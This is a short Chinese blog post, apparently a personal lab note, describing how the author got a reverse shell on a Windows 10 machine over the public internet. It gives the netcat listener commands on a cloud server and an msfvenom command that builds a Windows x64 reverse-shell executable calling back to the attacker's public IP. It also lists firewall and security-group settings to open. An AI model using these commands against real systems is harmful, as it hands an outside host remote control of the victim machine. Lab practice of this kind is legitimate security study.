windows上获取reverse shell

184 阅读1分钟

前置内容

一直认为reverse shell只有在局域网中才能获取(虽然按原理来看只要attacker能够收到victim的请求就可以建立reverse shell,不需要在意attacker与victim是否处于一个局域网)

但直到今天才在公网中获取到reverse shell

实验环境:

一台windows10主机(victim): 192.168.76.66

一台云服务器centos主机(attacker): 8.130.xx.xxx

一台kali虚拟机: 利用msfvenom生成payload

实验过程

centos上:

# yum install -y nc
# nc -nvlp 3000

kali上:

# msfvenom -p windows/x64/shell_reverse_tcp LHOST=8.130.xx.xxx LPORT=3000 -f exe -o /root/test.exe

win10主机上:

运行kali上生成的payload

踩坑点

  1. centos上的防火墙的3000端口未打开
  2. 阿里云服务器的安全组策略中的3000端口没有显式开放!!!!(很重要)